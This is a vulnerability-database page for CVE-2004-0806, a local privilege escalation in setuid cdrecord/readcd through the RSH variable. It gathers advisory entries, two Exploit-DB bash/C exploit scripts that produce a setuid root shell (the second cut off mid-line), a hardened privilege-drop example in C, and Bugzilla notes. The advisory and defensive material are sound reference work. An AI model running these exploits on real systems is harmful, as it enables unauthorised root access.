CVE-2004-0806
Published: 2004-12-31
CVE-2004-0806: cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH…
Priority: P4 · 32 · high · 7.2 (CVSS 2.0)
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Exploit: available (Exploit-DB entries below)
EPSS: 1.73% (74.7th percentile)
cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cdrtools | cdrecord | — | — |
| cdrtools | cdrecord | — | — |
CVSS provenance
nvd · CVSS v2.0 · 7.2 HIGH · AV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat · 7.2 HIGH
Red Hat
security flaw
vendor_redhat·2004-09-09·CVSS 7.2
cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.
Statement: Not vulnerable. cdrecord is not shipped setuid and does not need to be made setuid with Red Hat Enterprise Linux 2.1, 3, or 4 packages.
GHSA
GHSA-gw49-f4qm-3gcc: cdrecord in the cdrtools package before 2
ghsa_unreviewed·2022-05-03
cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.
No detection rules found.
Exploit-DB
CDRecord's ReadCD - Local Privilege Escalation
exploitdb·2004-09-19
---
#!/bin/bash
echo "readcd-exp.sh -- ReadCD local exploit ( Test on cdrecord-2.01-0.a27.2mdk)"
echo "Author : newbug [at] chroot.org"
echo "Date :09.13.2004"
echo "IRC : irc.chroot.org #discuss"
export READCD=/usr/bin/readcd
cd /tmp
# s: the program the setuid readcd will exec as its "rsh". readcd runs it
# while still euid 0, so it can turn /tmp/ss into a setuid-root binary.
cat > s.c << _EOF_
#include <unistd.h>
#include <sys/stat.h>
int main()
{
setuid(0);setgid(0);
/* chown first: changing the owner clears the setuid bit, so chmod must follow */
chown("/tmp/ss", 0, 0);
chmod("/tmp/ss", 04755);
return 0;
}
_EOF_
# ss: the binary that becomes the root shell once s has made it setuid root.
cat > ss.c << _EOF_
#include <unistd.h>
int main()
{
setuid(0);setgid(0);
execl("/bin/bash","bash",(char *)0);
return 0;
}
_EOF_
gcc -o s s.c
gcc -o ss ss.c
# A REMOTE: device makes readcd spawn $RSH to reach the remote host; the
# spawn happens before privileges are dropped, so /tmp/s runs as root.
export RSH=/tmp/s
$READCD dev=REMOTE:brk.chroot.org:1,0,1 1 >/dev/null 2>&1
/tmp/ss
// milw0rm.com [2004-09-19]
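The exploit above works because a setuid-root helper calls exec() on whatever $RSH names while its effective uid is still 0. The C program below is an added example written for this page; it is not cdrtools code and not the upstream 2.01 fix. It places that vulnerable shape next to a hardened version that ignores the $RSH override whenever real and effective uids differ, permanently drops privileges (gid first, then uid), verifies the drop with getresuid/getresgid, and only then execs. The default path /usr/bin/rsh, the "rscsi" argument layout and all function names are assumptions.

```c
/* Added example (not cdrtools code): the setuid-exec pattern behind
 * CVE-2004-0806 and a hardened version of it. Names and the default
 * rsh path are assumptions made for this illustration. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_RSH "/usr/bin/rsh"   /* assumed default, not from the page */

/* Vulnerable shape: a setuid-root helper spawns whatever $RSH names while
 * euid is still 0. With RSH=/tmp/s, /tmp/s runs as root. */
static void vulnerable_spawn_remote(const char *host)
{
    const char *rsh = getenv("RSH");
    if (rsh == NULL)
        rsh = DEFAULT_RSH;
    /* nothing has been dropped yet: euid == 0 across this exec */
    execl(rsh, rsh, host, "rscsi", (char *)0);
    perror("execl");
    _exit(127);
}

/* Hardened: pick the program to run. When real and effective uids differ
 * the process is running setuid and its environment belongs to the caller,
 * so the override is ignored. Relative names are also refused. */
const char *select_rsh_program(const char *env_rsh, uid_t ruid, uid_t euid)
{
    if (env_rsh == NULL || env_rsh[0] == '\0')
        return DEFAULT_RSH;
    if (ruid != euid)
        return DEFAULT_RSH;          /* setuid: distrust $RSH entirely */
    if (env_rsh[0] != '/')
        return DEFAULT_RSH;          /* no $PATH lookups of caller input */
    return env_rsh;
}

/* Hardened: drop to the real uid/gid for good and make the kernel confirm
 * it. gid goes first because setgid() to a foreign group needs euid 0.
 * Returns 0 on success, -1 if any step failed or the drop is reversible. */
int drop_privileges_permanently(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    uid_t r, e, s;
    gid_t gr, ge, gs;

    if (setgid(rgid) != 0)
        return -1;
    if (setuid(ruid) != 0)
        return -1;

    /* The saved ids must be gone too, or setuid(0) would still work. */
    if (getresuid(&r, &e, &s) != 0 || r != ruid || e != ruid || s != ruid)
        return -1;
    if (getresgid(&gr, &ge, &gs) != 0 || gr != rgid || ge != rgid || gs != rgid)
        return -1;

    /* Belt and braces: regaining root must now fail (unless we really are root). */
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

static void hardened_spawn_remote(const char *host)
{
    uid_t ruid = getuid(), euid = geteuid();
    /* decide what to run while both ids are still known ... */
    const char *rsh = select_rsh_program(getenv("RSH"), ruid, euid);
    /* ... then shed root before anything taken from the environment runs */
    if (drop_privileges_permanently() != 0) {
        fprintf(stderr, "cannot drop privileges, refusing to exec\n");
        _exit(1);
    }
    execl(rsh, rsh, host, "rscsi", (char *)0);
    perror("execl");
    _exit(127);
}

int main(int argc, char **argv)
{
    const char *host = argc > 1 ? argv[1] : "localhost";
    if (argc > 2 && strcmp(argv[2], "vulnerable") == 0)
        vulnerable_spawn_remote(host);
    hardened_spawn_remote(host);
    return 0;
}
```

Run as an ordinary user, `./demo somehost` execs /usr/bin/rsh (or $RSH if it is an absolute path) with privileges unchanged; installed setuid root, the same binary ignores $RSH and is uid/gid of the caller by the time exec happens. The order inside hardened_spawn_remote is the whole point: the decision uses the pre-drop ids, the exec happens after the drop has been verified.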
Exploit-DB
CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation
exploitdb·2004-09-11
---
#!/bin/bash
#
# cdrecord-suidshell.sh - I)ruid [CAU] (09.2004)
#
# Exploits cdrecord's exec() of $RSH before dropping privs
#
# cpbinbash is what cdrecord execs in place of rsh; running as root, it
# copies /bin/bash into the current directory and makes the copy setuid.
cat > ./cpbinbash.c << __EOF__
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
int main( int argc, char *argv[] ) {
int fd1, fd2;
int count;
char buffer[1];
/* Set ID's */
setuid( geteuid() );
setgid( geteuid() );
/* Copy the shell */
if ((fd1=open( "/bin/bash", O_RDONLY))<0)
return -1;
if ((fd2=open( "./bash", O_WRONLY|O_CREAT, 0755))<0)
return -1;
while((count=read(fd1, buffer, 1)))
write(fd2, buffer, count);
close( fd1 );
close( fd2 );
/* Priv the shell: 3565 decimal is 06755, i.e. setuid+setgid, rwxr-xr-x */
chown( "./bash", geteuid(), geteuid() );
chmod( "./bash", 3565 );
return 0;
}
__EOF__
cc ./cpbinbash.c -o ./cpbinbash
# Set up environment
export RSHSAVE=$RSH
export RSH=./cpbinbas
Bugzilla
CVE-2004-0806 security flaw
bugzilla·2018-08-16·CVSS 7.2
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.
---
Statement:
Not vulnerable. cdrecord is not shipped setuid and does not need to be made setuid with Red Hat Enterprise Linux 2.1, 3, or 4 packages.
Bugzilla
CVE-2004-0813 SG_IO unsafe user command execution
bugzilla·2007-03-13·CVSS 7.2
bug 133098 describes a flaw in the way the kernel handles certain SG_IO
commands. A user who has access to a /dev/sg file, can do scary things they
shouldn't be able to. In RHEL3 we currently give the console user read/write
access to /dev/sg devices which are also recordable CD drives. This is
obviously a problem.
Fixing this in the kernel will be nearly impossible given how the RHEL3 kernel
works. We can however fix it by changing the way cdrecord works.
If we use consolehelper to launch cdrecord, the end user should notice no change
in behavior, and will allow us to control who is able to execute cdrecord as the
root user.
Discussion:
If we set cdrecord to be setuid root, we will need to add the patch for
CVE-2004-0806, which could

References
ftp://patches.sgi.com/support/free/security/advisories/20060401-01-U
http://seclists.org/lists/bugtraq/2004/Sep/0097.html
http://secunia.com/advisories/12481/
http://secunia.com/advisories/19532
http://securitytracker.com/id?1011091
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-09/0108.html
http://www.kb.cert.org/vuls/id/700326
http://www.mandriva.com/security/advisories?name=MDKSA-2004:091
http://www.securityfocus.org/bid/11075
https://bugzilla.fedora.us/show_bug.cgi?id=2058
https://exchange.xforce.ibmcloud.com/vulnerabilities/17303
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9805